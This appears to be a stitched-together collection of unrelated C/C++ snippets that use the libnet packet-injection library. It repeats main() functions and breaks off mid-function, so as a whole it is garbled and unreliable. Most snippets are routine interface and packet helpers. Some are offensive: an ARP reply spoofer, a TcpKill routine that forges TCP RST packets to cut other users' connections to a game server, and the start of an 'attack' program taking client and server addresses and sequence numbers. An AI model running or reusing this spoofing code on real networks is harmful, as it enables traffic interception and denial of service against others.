void sighandler(int sig) {
if (sig == SIGALRM) {
libnet_destroy(lnp);
pcap_close(pcp);
exit(0);
}
}
struct libnet_ethernet_hdr anubis_default_ethernet_header(const char *device) {
struct libnet_ethernet_hdr ethernet_hdr = {0};
memset(ðernet_hdr, 0, sizeof(ethernet_hdr));
char errbuf[LIBNET_ERRBUF_SIZE] = {0};
libnet_t *handle = NULL;
#ifdef __CYGWIN__
char device2[ANUBIS_BUFFER_SIZE] = {0};
snprintf(device2, sizeof(device2), "\\Device\\NPF_%s", device);
handle = anubis_libnet_init(LIBNET_RAW4, device2, errbuf);
#else
handle = anubis_libnet_init(LIBNET_RAW4, device, errbuf);
#endif
if(!handle) {
anubis_err("%s\n", errbuf);
return ethernet_hdr;
}//end if
struct libnet_ether_addr *src_mac = libnet_get_hwaddr(handle);
if(src_mac)
memmove(ethernet_hdr.ether_shost, src_mac, sizeof(ethernet_hdr.ether_shost));
else
anubis_err("%s\n", libnet_geterror(handle));
libnet_destroy(handle);
return ethernet_hdr;
}//end anubis_default_ethernet_header
u_int8_t *anubis_default_mac_address(const char *device) {
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *handle = NULL;
#ifdef __CYGWIN__
char device2[ANUBIS_BUFFER_SIZE] = {0};
snprintf(device2, sizeof(device2), "\\Device\\NPF_%s", device);
handle = anubis_libnet_init(LIBNET_RAW4, device2, errbuf);
#else
handle = anubis_libnet_init(LIBNET_RAW4, device, errbuf);
#endif
static u_int8_t *address = NULL;
if(!handle) {
anubis_err("%s\n", errbuf);
return NULL;
}//end if
struct libnet_ether_addr *my_mac = libnet_get_hwaddr(handle); //it is static
if(my_mac)
address = (u_int8_t *)my_mac;
else
anubis_err("%s\n", libnet_geterror(handle));
libnet_destroy(handle);
return address;
}//end anubis_default_mac_address
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE];
u_int32_t ip_addr;
struct libnet_ether_addr *mac_addr;
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
ip_addr = libnet_get_ipaddr4(l);
if (ip_addr != -1)
printf("IP address: %s\n", libnet_addr2name4(ip_addr, LIBNET_DONT_RESOLVE));
else
fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
mac_addr = libnet_get_hwaddr(l);
if (mac_addr != NULL)
printf("MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n",
mac_addr->ether_addr_octet[0], mac_addr->ether_addr_octet[1],
mac_addr->ether_addr_octet[2], mac_addr->ether_addr_octet[3],
mac_addr->ether_addr_octet[4], mac_addr->ether_addr_octet[5]);
else
fprintf(stderr, "Couldn't get own MAC address: %s\n", libnet_geterror(l));
libnet_destroy(l);
return 0;
}
in_addr_t anubis_default_ip_address(const char *device) {
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *handle = NULL;
#ifdef __CYGWIN__
char device2[ANUBIS_BUFFER_SIZE] = {0};
snprintf(device2, sizeof(device2), "\\Device\\NPF_%s", device);
handle = anubis_libnet_init(LIBNET_RAW4, device2, errbuf);
#else
handle = anubis_libnet_init(LIBNET_RAW4, device, errbuf);
#endif
if(!handle) {
anubis_err("%s\n", errbuf);
return 0;
}//end if
in_addr_t my_ip = libnet_get_ipaddr4(handle);
if(my_ip == -1) {
anubis_err("%s\n", libnet_geterror(handle));
my_ip = 0;
}//end if
libnet_destroy(handle);
return my_ip;
}//end anubis_default_ip_address
int main() {
int i;
char errbuf[LIBNET_ERRBUF_SIZE];
/* It's a good idea to have the payload as an array of
* * bytes. If yours isn't, make a pointer to it and cast
* * it.*/
u_int8_t payload[3000];
l = libnet_init(LIBNET_RAW4, "eth0", errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed (raw4, 1st call): %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating random payload */
libnet_seed_prand(l);
for (i = 0; i < sizeof(payload); i++) {
payload[i] = libnet_get_prand(LIBNET_PR8);
}
/* Building and sending the fragments */
frag_and_send(payload, sizeof(payload));
libnet_destroy(l);
return 0;
}
void params_free(struct init_params *params)
{
if (params->bind_address != NULL)
free(params->bind_address);
if (params->bind_port != NULL)
free(params->bind_port);
if (params->proxy_address != NULL)
free(params->proxy_address);
if (params->destination_address != NULL)
free(params->destination_address);
if (params->destination_port != NULL)
free(params->destination_port);
if (params->packets_send != NULL)
packets_free(params->packets_send);
if (params->packets_receive != NULL)
packets_free(params->packets_receive);
if (params->connections != NULL)
connections_free(params->connections);
if (params->client_buffer != NULL)
data_free(params->client_buffer);
if (params->libnet != NULL)
libnet_destroy(params->libnet);
if (params->libpcap != NULL)
pcap_close(params->libpcap);
free(params);
}
int TCP_SF_Sender::tcpSF(unsigned int destip, unsigned short dport,unsigned int seq, unsigned int control, unsigned short IPid)
{
// TODO : now we use the fixed ethernet,we will do something to make it find ethernet by itself
char dev[DEV_MAX] ; /* set device name */
strcpy(dev,global_dev);
libnet_t *l = NULL;
libnet_ptag_t packetTag; // the tag return by some build functions
char errBuff[LIBNET_ERRBUF_SIZE] = {0};
// first is to initilize the library and create the envirnoment
l = libnet_init(LIBNET_RAW4,dev,errBuff);
if( NULL==l ){
return -1;
}
// create the tcp header
packetTag=libnet_build_tcp(
25555, // source port(fixed)
dport, // dest port
seq, // TODO : seq
0, // ack
control, // control flags
0, // window size
0, // checksum (0 for autofill)
0, // urgent pointer
LIBNET_TCP_H,// total length of the TCP packet (for checksum calculation)
NULL, // playload
0, // playload length
l, // the libnet context
0 // build a new one
);
// source ip is my IP
u_long source;
source = libnet_get_ipaddr4(l);
if( -1==int(source) ){
return -1;
}
// create the ip header
packetTag=libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H,
0,
IPid, // id
0,
60, // TTL
IPPROTO_TCP,
0,
source,
destip,
NULL,
0,
l,
0
);
// send packets
int packet_length = libnet_write(l);
// destory the session
libnet_destroy(l);
return packet_length;
}
void spoof_arp(in_addr_t ipaddr, in_addr_t destip, u_int8_t *macaddr, u_int8_t *destmacaddr)
{
libnet_ptag_t arp = 0; /* ARP protocol tag */
libnet_ptag_t eth = 0; /* Ethernet protocol tag */
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
l = libnet_init(LIBNET_LINK, dev, errbuf);
if (l == NULL)
{
fprintf (stderr, "Error Opening Context: %s\n", errbuf);
exit(1);
}
arp = libnet_autobuild_arp(ARPOP_REPLY,
macaddr,
(u_int8_t *) &ipaddr,
destmacaddr,
(u_int8_t *) &destip,
l);
if (arp == -1)
{
fprintf(stderr,
"Unable to build ARP header: %s\n", libnet_geterror (l));
exit(1);
}
eth = libnet_build_ethernet(destmacaddr,
macaddr,
ETHERTYPE_ARP,
NULL,
0,
l,
eth);
if (eth == -1)
{
fprintf (stderr,
"Unable to build Ethernet header: %s\n", libnet_geterror (l));
exit (1);
}
/* write the packet */
if ((libnet_write (l)) == -1)
{
fprintf (stderr, "Unable to send packet: %s\n", libnet_geterror (l));
exit (1);
}
/* exit cleanly */
libnet_destroy (l);
}
void main(int argc,char *argv[])
{
if(argc!=2)
{
printf("用法错误:需要添加目的IP参数\n");
return;
}
char error_buf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
l= libnet_init(LIBNET_LINK_ADV,NULL,error_buf);
if(l==NULL)
{
printf("libnet初始化错误:%s\n",error_buf);
libnet_destroy(l);
return;
}
u_char arp_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
u_char arp_dha[6]={0x00,0x00,0x00,0x00,0x00,0x00};
char *arp_src_ip="192.168.1.6";
u_int arp_spa=libnet_name2addr4(l,arp_src_ip,LIBNET_RESOLVE);
char *arp_dst_ip=argv[1];
u_int arp_dpa=libnet_name2addr4(l,arp_dst_ip,LIBNET_RESOLVE);
if(libnet_build_arp(ARPHRD_ETHER,ETHERTYPE_IP,6,4,ARPOP_REQUEST,arp_sha,(u_int8_t *)&arp_spa,arp_dha,(u_int8_t *)&arp_dpa,NULL,0,l,0)==-1)
{
printf("构造ARP错误:%s\n",libnet_geterror(l));
libnet_destroy(l);
return;
}
u_char ether_sha[6]={0x00,0x1e,0x90,0xc7,0xe3,0xbb};
u_char ether_dha[6]={0xff,0xff,0xff,0xff,0xff,0xff};
if(libnet_build_ethernet(ether_dha,ether_sha,ETHERTYPE_ARP,NULL,0,l,0)==-1)
{
printf("构造以太错误:%s\n",libnet_geterror(l));
libnet_destroy(l);
return;
}
//libnet_diag_dump_pblock(l);
//libnet_diag_dump_context(l);
libnet_write(l);
libnet_destroy(l);
return;
}
int main(int argc, char* argv[]) {
srandomdev();
if (argc != 2) {
errx(EX_USAGE, "Usage: %s <device>", argv[0]);
}
char* dev = argv[1];
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t* context = libnet_init(LIBNET_LINK, dev, errbuf);
if (context == NULL) {
errx(EX_UNAVAILABLE, "libnet_init: %s", errbuf);
}
uint8_t buf[MAX_DHCP_SIZE];
uint16_t size = MAX_DHCP_SIZE;
build_dhcp_discover(source_mac, "lozenge", buf, &size);
libnet_ptag_t ether_tag = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t ip_tag = LIBNET_PTAG_INITIALIZER;
libnet_ptag_t udp_tag = LIBNET_PTAG_INITIALIZER;
udp_tag = libnet_build_udp(68, 67, LIBNET_UDP_H + size,
0, buf, size,
context, udp_tag);
u_short ipid = random() & 0xffff;
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + size,
0, ipid, 0, 0xff,
IPPROTO_UDP, 0, 0, 0xffffffff,
NULL, 0, context, ip_tag);
ether_tag = libnet_build_ethernet(broadcast_mac, source_mac,
ETHERTYPE_IP, NULL, 0, context, ether_tag);
if (libnet_write(context) == -1) {
libnet_destroy(context);
errx(EX_UNAVAILABLE, "libnet_write");
}
printf("Wrote\n");
libnet_destroy(context);
return 0;
}
/*-
-- net:destroy()
Manually destroy a net object, freeing it's resources (this will happen
on garbage collection if not done explicitly).
*/
static int lnet_destroy (lua_State *L)
{
libnet_t** ud = luaL_checkudata(L, 1, L_NET_REGID);
if(*ud)
libnet_destroy(*ud);
*ud = NULL;
return 0;
}
struct libnet_ipv4_hdr anubis_default_ip_header(const char *device) {
struct libnet_ipv4_hdr ip;
char errbuf[LIBNET_ERRBUF_SIZE];
int ttl;
memset(&ip, 0, sizeof(ip));
ip.ip_v = IPVERSION;
ip.ip_hl = sizeof(ip) >> 2;
anubis_srand();
ip.ip_id = random();
#if 0
int mib[4];
size_t sz;
mib[0] = CTL_NET;
mib[1] = PF_INET;
mib[2] = IPPROTO_IP;
mib[3] = IPCTL_DEFTTL;
sz = sizeof(ttl);
if (sysctl(mib, 4, &ttl, &sz, NULL, 0) == -1) {
anubis_perror("sysctl()");
return ip;
}//end if
#else
ttl = 64;
#endif
ip.ip_ttl = ttl;
libnet_t *handle = NULL;
#ifdef __CYGWIN__
char device2[ANUBIS_BUFFER_SIZE] = {0};
snprintf(device2, sizeof(device2), "\\Device\\NPF_%s", device);
handle = anubis_libnet_init(LIBNET_RAW4, device2, errbuf);
#else
handle = anubis_libnet_init(LIBNET_RAW4, device, errbuf);
#endif
if(!handle) {
anubis_err("%s\n", errbuf);
return ip;
}//end if
ip.ip_src.s_addr = libnet_get_ipaddr4(handle);
libnet_destroy(handle);
return ip;
}//end anubis_default_ip_header
int main(int argc, char *argv[])
{
libnet_t *l;
char errbuf[LIBNET_ERRBUF_SIZE];
if (argc == 1)
{
fprintf(stderr,"Usage: %s device\n",errbuf);
exit(EXIT_FAILURE);
}
l = libnet_init(LIBNET_RAW4,argv[1],errbuf);
if (l == NULL)
{
fprintf(stderr,"libnet_init() error: %s\n",errbuf);
exit(EXIT_FAILURE);
}
libnet_destroy(l);
return 0;
}
//===============================
//I tried to do this same concept using LIBNET_RAW4 instead of LIBNET_LINK so
//I wouldn't have to worry about the ethernet header. But something weird happens when I
//try to do this. If there is already an established connection.. e.g. 70.116.23.2:3779 to
//192.168.0.2:6112, if we send the packet using raw4, in tcpdump we get
//70.116.23.2:1024 --> 192.168.0.2:6112. I am really not sure why it won't send the correct
//source port if that connection is already established, but using LIBNET_LINK seems to not
//have this problem. I believe it is a kernel related issue.
void TcpKill::Execute(const wxString &sIp, u_int nPort)
{
char szErrBuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip;
libnet_ptag_t tcp;
wxString sSniffDevice = CONFIG(wxString, "Network/SniffDevice");
wxString sGameHost = CONFIG(wxString, "Network/GameHost");
int nGamePort = CONFIG(int, "Network/GamePort");
shared_ptr<NodeInfo> pNodeInfo = Info::Get()->GetNodeInfo(sIp, nPort);
if (!pNodeInfo) {
//Interface::Get()->Output(wxString::Format("Can't find %s:%d in net info map.", m_sIp.c_str(), m_nPort), OUTPUT_ERROR);
return;
}
NetInfo &netInfo = Info::Get()->GetNetInfo();
//This is pretty inefficient since I constantly init libnet and destroy it. It would be better
//if we could init once and just keep changing the sequence number and destination ip.
for (u_int x = 0; x < m_nSeverity; x++) {
u_int32_t seq_out = pNodeInfo->last_sentack;
libnet_t *pLibnet = libnet_init(LIBNET_LINK, const_cast<char *>(sSniffDevice.c_str()), szErrBuf);
libnet_seed_prand(pLibnet);
tcp = libnet_build_tcp(nPort, nGamePort,
seq_out, 0, TH_RST, 0, 0, 0, LIBNET_TCP_H, NULL, 0, pLibnet, 0);
u_long src_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sIp.c_str()), LIBNET_DONT_RESOLVE);
u_long dst_ip = libnet_name2addr4(pLibnet, const_cast<char *>(sGameHost.c_str()), LIBNET_DONT_RESOLVE);
ip = libnet_build_ipv4(sizeof(net_ip) + sizeof(net_tcp), 0,
libnet_get_prand(LIBNET_PRu16), 0, 64, IPPROTO_TCP, 0,
src_ip, dst_ip, NULL, 0, pLibnet, 0);
libnet_autobuild_ethernet(netInfo.gamehost_ether, ETHERTYPE_IP, pLibnet);
libnet_write(pLibnet);
libnet_destroy(pLibnet);
}
}
/** @brief free resources used by the library
*
* @param f the context owning the resources
* @return always succeeds with FBLIB_ESUCCESS
*/
fblib_err
libfb_destroy (libfb_t * f)
{
if (f)
{
if (f->connected)
close (f->udp_socket);
if (f->p)
pcap_close (f->p);
if (f->l)
libnet_destroy (f->l);
if (f->s_mac)
free (f->s_mac);
free (f);
}
return FBLIB_ESUCCESS;
}
/* failure notice and exit */
void
fatal(const char *format, ...)
{
va_list ap;
va_start(ap, format);
if(format)
vfprintf(stderr, format, ap);
va_end(ap);
fflush(stderr);
if(sk_libnet_link)
libnet_destroy(sk_libnet_link);
if(sk_pkt)
free(sk_pkt);
exit(EXIT_FAILURE);
}
// Initialise fake TCP session state
int init_fake_session_state( FakeSessionState* fakeSess )
{
// Init libnet context
fakeSess->ln = libnet_init(
LIBNET_LINK,
config.cap[capindex]->dst_interface,
errbuf.libnet
);
if( fakeSess->ln == NULL )
{
if (config.daemon)
syslog(LOG_ERR, "error opening libnet context: %s", errbuf.libnet);
else
fprintf(stderr, "Error opening libnet context: %s.\n", errbuf.libnet);
return( -1 );
}
if( libnet_seed_prand( fakeSess->ln ) == -1 )
{
if (config.daemon)
syslog(LOG_ERR, "error seeding libnet prand: %s", errbuf.libnet);
else
fprintf(stderr, "Error seeding libnet prand: %s.\n", errbuf.libnet);
libnet_destroy( fakeSess->ln );
return( -1 );
}
// Initialise other member variables
fakeSess->handshakeSent = 0;
fakeSess->clientSeq = libnet_get_prand (LIBNET_PRu16);
fakeSess->serverSeq = libnet_get_prand (LIBNET_PRu16);
return( 1 );
}
struct libnet_dhcpv4_hdr anubis_default_dhcp_header(const char *device) {
struct libnet_dhcpv4_hdr dhcp_hdr = {0};
dhcp_hdr.dhcp_htype = 1;
dhcp_hdr.dhcp_hlen = ETHER_ADDR_LEN;
anubis_srand();
dhcp_hdr.dhcp_xid = (u_int32_t)random();
dhcp_hdr.dhcp_magic = DHCP_MAGIC;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *handle = NULL;
#ifdef __CYGWIN__
char device2[ANUBIS_BUFFER_SIZE] = {0};
snprintf(device2, sizeof(device2), "\\Device\\NPF_%s", device);
handle = anubis_libnet_init(LIBNET_RAW4, device2, errbuf);
#else
handle = anubis_libnet_init(LIBNET_RAW4, device, errbuf);
#endif
if(!handle) {
anubis_err("%s\n", errbuf);
return dhcp_hdr;
}//end if
struct libnet_ether_addr *my_mac = libnet_get_hwaddr(handle);
if(my_mac) {
memmove(dhcp_hdr.dhcp_chaddr, my_mac, sizeof(dhcp_hdr.dhcp_chaddr));
}
else {
anubis_err("%s\n", libnet_geterror(handle));
}
libnet_destroy(handle);
return dhcp_hdr;
}//end anubis_default_dhcp_header
int
main(int argc, char *argv[])
{
int c, len;
libnet_t *l;
libnet_ptag_t t;
u_char *dst;
u_long ip;
u_char dhost[5] = {0x01, 0x00, 0x0c, 0x00, 0x00};
u_char snap[6] = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00};
char *device = NULL;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: [ISL]\n");
device = NULL;
dst = NULL;
while ((c = getopt(argc, argv, "i:d:")) != EOF)
{
switch (c)
{
case 'd':
dst = libnet_hex_aton(optarg, &len);
break;
case 'i':
device = optarg;
break;
}
}
if (dst == NULL)
{
fprintf(stderr, "usage %s -d dst [-i interface]\n",
argv[0]);
exit(EXIT_FAILURE);
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
ip = libnet_get_ipaddr4(l);
t = libnet_build_arp(
ARPHRD_ETHER, /* hardware addr */
ETHERTYPE_IP, /* protocol addr */
6, /* hardware addr size */
4, /* protocol addr size */
ARPOP_REPLY, /* operation type */
enet_src, /* sender hardware addr */
(u_char *)&ip, /* sender protocol addr */
enet_dst, /* target hardware addr */
(u_char *)&ip, /* target protocol addr */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ARP header: %s\n", libnet_geterror(l));
goto bad;
}
t = libnet_autobuild_ethernet(
dst, /* ethernet destination */
ETHERTYPE_ARP, /* protocol type */
l); /* libnet handle */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
t = libnet_build_isl(
dhost,
0x0,
0x0,
enet_src,
10 + 42,
snap,
10,
0x8000,
0,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ISL header: %s\n",
libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte ISL packet; check the wire.\n", c);
}
free(dst);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
free(dst);
libnet_destroy(l);
return (EXIT_FAILURE);
}
ArpPkt::~ArpPkt()
{
libnet_destroy(l);
}
int send_eth()
{
// Tasks:
// 1. Check 'eth_src_txt' and 'eth_dst_txt' which contain either a MAC address or a keyword
// 'eth_dst' can be set without having 'eth_src_txt' specified (the next 6 bytes of the
// 'arg_string' will be used). But if 'eth_src_txt' is given then also 'eth_dst_txt'
// should have been specified, otherwise a default (ff-ff-ff-ff-ff-ff) will be used.
// 2. Check whether 'arg_string' contains a hex-string. If YES then convert it into an
// 'eth_payload' and extract eth_type.
// 3. Apply 'padding' if specified
// 4. Check if frame has at least minimum length (14 Bytes).
// 5. Send frame 'count' times and
// 6. Apply 'delay' (make precautions for better delay functions)
int
src, // flag telling whether user has specified a source address
dst, // flag telling whether user has specified a destination address
src_random=0,
dst_random=0,
byte_ptr=1,
bytestring_s=0,
min_size=15,
pad=0,
repeat, loop, update,
i=0,
j=0;
char
err_buf[LIBNET_ERRBUF_SIZE],
message[MAX_PAYLOAD_SIZE*3];
u_int8_t bytestring[MAX_PAYLOAD_SIZE];
libnet_ptag_t t;
libnet_t *l;
if (tx.dot1Q)
{
fprintf(stderr," Note: raw layer 2 mode does not support 802.1Q builder.\n"
" If you want to create VLAN tags then you must do it by hand.\n");
exit(1);
}
if (tx.mpls)
{
fprintf(stderr," Note: raw layer 2 mode does not support MPLS builder.\n"
" If you want to create MPLS labels then you must do it by hand.\n");
exit(1);
}
// So other functions can use this function for sending Ethernet frames
// These other functions must set dst, src, type and payload!
if (tx.eth_params_already_set) goto ALL_SPECIFIED;
if ((tx.padding) && (tx.padding<15)) // Note: ignored if padding==0
{
tx.padding=15;
if (mz_port) {
cli_print(gcli, "Note: Set padding to 15 bytes (total length)\n");
} else
fprintf(stderr, " mz/send_eth: [Note] adjusted minimum frame size to 15 bytes.\n");
}
// Create a temporal, local bytestring:
//
for (i=0; i<MAX_PAYLOAD_SIZE; i++) bytestring[i]=0x00;
bytestring_s = str2hex (tx.arg_string, bytestring, MAX_PAYLOAD_SIZE);
// Set the flags to shorten subsequent decisions:
src = strlen(tx.eth_src_txt);
dst = strlen(tx.eth_dst_txt);
// IN ANY CASE if src has been specified:
//
if (src)
{
// Evaluate Ethernet CLI options (-a and -b)
if (check_eth_mac_txt(ETH_SRC)) // if true then problem!
{
// use own (already set in init.c)
}
src_random = tx.eth_src_rand; // local vars are faster
}
// IN ANY CASE if dst has been specified:
//
if (dst)
{
// Evaluate Ethernet CLI options (-a and -b)
if (check_eth_mac_txt(ETH_DST)) // if true then problem!
{
str2hex("ff:ff:ff:ff:ff:ff",tx.eth_dst, 6); // the default
}
dst_random = tx.eth_dst_rand; // local vars are faster
}
// Catch errors with too short bytestrings:
//
if (src)
{
// bytestring only needs to contain eth_type
min_size-=12;
}
else if (dst)
{
// bytstring must contain src and type
min_size-=6;
}
if (bytestring_s < min_size)
{
j = min_size - bytestring_s; // this is what's missing
bytestring_s += j; // note that bytestring has been filled up with 0x00, so we can do that
}
// ADDENDUM: If src specified, dst missing:
//
if ( (!dst) && (src) )
{
str2hex_mac ("ff:ff:ff:ff:ff:ff", tx.eth_dst);
}
// ADDENDUM: If dst specified, src missing:
//
if ((dst) && (!src))
{
// Get eth_src from bytestring:
if (bytestring_s>=6) {
(void) getbytes (bytestring, tx.eth_src, byte_ptr, byte_ptr+5);
byte_ptr=7; // now points to eth_type within bytestring
}
}
// FINALLY: If both dst and src have NOT been specified:
//
if ((!dst) && (!src))
{
if (bytestring_s>=6) {
(void) getbytes (bytestring, tx.eth_dst, byte_ptr, byte_ptr+5);
byte_ptr=7;
}
if (bytestring_s>=12) {
(void) getbytes (bytestring, tx.eth_src, byte_ptr, byte_ptr+5);
byte_ptr=13; // points to eth_type
}
}
// Set eth_type:
//
if (bytestring_s>=2) {
tx.eth_type = 256 * bytestring[byte_ptr-1] + bytestring[byte_ptr]; // don't forget: byte_ptr counts from 1 not 0
byte_ptr+=2; // points to first payload byte (if available)
}
// Get remaining payload:
//
if ( (tx.eth_payload_s = bytestring_s - byte_ptr +1) > 0 ) // if there are any remaining bytes
{
(void) getbytes (bytestring, tx.eth_payload, byte_ptr, bytestring_s);
}
// Add padding if desired.
// Note: padding means 'extend to given length' (not 'add these number of bytes')
if (tx.padding)
{
pad = tx.padding - (14 + tx.eth_payload_s); // number of additonal pad bytes required
for (i=0; i<pad; i++)
{
// tx.eth_payload[i+tx.eth_payload_s] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_payload[i+tx.eth_payload_s] = 0x00;
}
tx.eth_payload_s += pad;
}
ALL_SPECIFIED:
// *** All Ethernet parameters have been determined !
// *** Now let's send the frame!
l = libnet_init (LIBNET_LINK_ADV, tx.device, err_buf );
if (l == NULL)
{
fprintf(stderr, " mz/send_eth: libnet_init() failed (%s)", err_buf);
return -1;
}
repeat=1;
if (tx.count == 0)
{
loop = 1000000;
if (!quiet)
fprintf(stderr, " mz: !!! Infinite mode! Will send frames until you stop Mausezahn!!!\n");
}
else
loop = tx.count;
if ( (!quiet) && (!tx.delay) && (tx.count==0) )
fprintf(stderr, " mz: !!! Will send at maximum frame rate without feedback!!!\n");
t=0;
update=1;
// this is for the statistics:
mz_start = clock();
total_d = tx.count;
while (repeat)
{
if (tx.count!=0) repeat=0; // count=0 means repeat ad inifinitum
for (i=0; i<loop; i++)
{
if (src_random)
{
tx.eth_src[0] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256) & 0xFE;
tx.eth_src[1] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_src[2] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_src[3] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_src[4] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_src[5] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
update=1;
}
if (dst_random)
{
tx.eth_dst[0] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_dst[1] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_dst[2] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_dst[3] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_dst[4] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
tx.eth_dst[5] = (u_int8_t) ( ((float) rand()/RAND_MAX)*256);
update=1;
}
if (update) // new frame parameters
{
t = libnet_build_ethernet (tx.eth_dst,
tx.eth_src,
tx.eth_type,
tx.eth_payload,
tx.eth_payload_s,
l,
t);
if (t == -1)
{
fprintf(stderr, " mz/send_eth: %s", libnet_geterror(l));
return -1;
}
if (verbose)
{
bs2str (tx.eth_dst, message, 6); // DA
fprintf(stderr, " mz: send %s",message);
bs2str (tx.eth_src, message, 6); // SA
fprintf(stderr, " %s",message);
type2str(tx.eth_type, message);
fprintf(stderr, " %s",message); // Type
bs2str (tx.eth_payload, message, tx.eth_payload_s); // Payload
fprintf(stderr, " %s\n",message);
}
update=0;
if (verbose==2)
{
fprintf(stderr, "\n");
fprintf(stderr, "*** NOTE: Simulation only! Nothing has been sent! ***\n");
libnet_destroy(l);
return 0;
}
}
libnet_write(l);
if (tx.delay)
{
SLEEP (tx.delay);
if ( (verbose) && (!src_random) && (!dst_random) )
{
fprintf(stderr, ".");
}
}
} // end for
} // end while
if (verbose)
{
if ((tx.delay) || (tx.count==0))
{
fprintf(stderr,"\n");
}
fprintf(stderr, " mz: sent %u frames.\n",loop);
}
libnet_destroy(l);
return 0;
}
int main(int argc, char **argv)
{
int i;
libnet_ptag_t ipTag, etherTag, tcpTag, c;
char errbuf[LIBNET_ERRBUF_SIZE];
sprintf(DA,"%02x:%02x:%02x:%02x:%02x:%02x",
0x0,0xB,0xB,0xB,0xB,0xB);
memset(seq,0,NUM_PKTS);
l = libnet_init(LIBNET_LINK_ADV, "nf2c0", errbuf);
if(l == NULL)
{
printf("erro em init()\n");
goto bad;
}
getDados();
for(i=0;i<NUM_PKTS;i++){
tcpTag = buildTCP(0,seq[i]);
if (tcpTag == -1)
goto bad;
ipTag = buildIP(0,IPPROTO_TCP);
if (ipTag == -1)
goto bad;
etherTag = buildEth(0);
if (etherTag == -1)
goto bad;
c = libnet_write(l);
if(c == -1)
goto bad;
libnet_write(l);
libnet_destroy(l);
seq[i] = LIBNET_IPV4_H+LIBNET_TCP_H+PAYLOAD_L+1;
l = libnet_init(LIBNET_LINK_ADV, "nf2c0", errbuf);
getDados();
}
//ack
for(i=0;i<NUM_PKTS;i++){
tcpTag = buildTCP(1,seq[i]);
if (tcpTag == -1)
goto bad;
ipTag = buildIP(1,IPPROTO_TCP);
if (ipTag == -1)
goto bad;
etherTag = buildEth(1);
if (etherTag == -1)
goto bad;
c = libnet_write(l);
if(c == -1)
goto bad;
libnet_write(l);
libnet_destroy(l);
seq[i] = seq[i]+LIBNET_IPV4_H+LIBNET_TCP_H+PAYLOAD_L+1;
l = libnet_init(LIBNET_LINK_ADV, "nf2c0", errbuf);
getDados();
}
//ack do ack
for(i=0;i<NUM_PKTS;i++){
tcpTag = buildTCP(0,seq[i]);
if (tcpTag == -1)
goto bad;
ipTag = buildIP(0,IPPROTO_TCP);
if (ipTag == -1)
goto bad;
etherTag = buildEth(0);
if (etherTag == -1)
goto bad;
c = libnet_write(l);
if(c == -1)
goto bad;
libnet_write(l);
libnet_destroy(l);
seq[i] = seq[i]+LIBNET_IPV4_H+LIBNET_TCP_H+PAYLOAD_L+1;
l = libnet_init(LIBNET_LINK_ADV, "nf2c0", errbuf);
getDados();
}
for(i=0;i<NUM_PKTS;i++){
tcpTag = buildUDP(0);
if (tcpTag == -1)
goto bad;
ipTag = buildIP(0,IPPROTO_UDP);
if (ipTag == -1)
goto bad;
etherTag = buildEth(0);
if (etherTag == -1)
goto bad;
c = libnet_write(l);
if(c == -1)
goto bad;
libnet_write(l);
libnet_destroy(l);
seq[i] = seq[i]+LIBNET_IPV4_H+LIBNET_TCP_H+PAYLOAD_L+1;
l = libnet_init(LIBNET_LINK_ADV, "nf2c0", errbuf);
getDados();
}
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
return -1;
}
int main(int argc, char **argv)
{
char *srv_addr;
char *srv_port;
char *cli_addr;
char *cli_port;
libnet_t *attack;
u_int32_t srv_ip_addr, cli_ip_addr, seq_num;
libnet_ptag_t ip_tag, tcp_tag;
char *error_msg = "Error";
if(argc >= 2) {
cli_addr = argv[1];
} else {
cli_addr = "127.0.0.1";
}
if(argc >= 3) {
cli_port = argv[2];
